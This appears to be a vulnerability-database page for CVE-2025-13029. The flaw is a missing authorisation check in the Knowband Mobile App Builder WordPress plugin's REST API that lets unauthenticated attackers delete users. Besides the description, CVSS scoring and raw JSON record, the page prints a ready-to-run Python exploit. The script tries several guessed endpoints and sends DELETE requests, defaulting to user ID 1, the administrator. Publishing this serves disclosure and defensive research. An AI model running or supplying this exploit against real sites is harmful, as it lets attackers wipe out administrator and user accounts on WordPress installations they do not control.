Security Vulnerability Report
中文
CVE-2025-13029 CVSS 7.5 HIGH

CVE-2025-13029

Published: 2025-12-31 06:15:40
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Knowband Mobile App Builder WordPress plugin before 3.0.0 does not have authorisation when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Knowband Mobile App Builder WordPress plugin < 3.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-13029 PoC - Knowband Mobile App Builder Unauthenticated User Deletion # Target: WordPress site with Knowband Mobile App Builder plugin < 3.0.0 def delete_wordpress_user(target_url, user_id): """ Exploit for CVE-2025-13029 Deletes arbitrary WordPress users without authentication Args: target_url: Base URL of the WordPress site user_id: ID of the user to delete Returns: Response from the server """ # Common REST API endpoint paths for the plugin endpoints = [ '/wp-json/mobile-app-builder/v1/delete_user', '/wp-json/kb-mobile-app/v1/delete_user', '/?rest_route=/mobile-app-builder/v1/delete_user' ] payload = { 'user_id': user_id } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Trying endpoint: {url}") try: # Send DELETE request without authentication response = requests.delete(url, json=payload, timeout=10) if response.status_code == 200: print(f"[+] Success! User {user_id} deleted via {url}") return response.json() elif response.status_code == 401: print(f"[-] Endpoint requires authentication") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None # Example usage if __name__ == '__main__': # Replace with target URL target = 'https://example.com' # User ID to delete (typically 1 for admin) user_id = 1 result = delete_wordpress_user(target, user_id) if result: print(f"Response: {json.dumps(result, indent=2)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13029", "sourceIdentifier": "[email protected]", "published": "2025-12-31T06:15:40.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Knowband Mobile App Builder WordPress plugin before 3.0.0 does not have authorisation when deleting users via its REST API, allowing unauthenticated attackers to delete arbitrary users."}, {"lang": "es", "value": "El plugin de WordPress Knowband Mobile App Builder anterior a la versión 3.0.0 no tiene autorización al eliminar usuarios a través de su API REST, lo que permite a atacantes no autenticados eliminar usuarios arbitrarios."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "references": [{"url": "https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/22344534-cd36-4817-b683-c0af55759e01/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.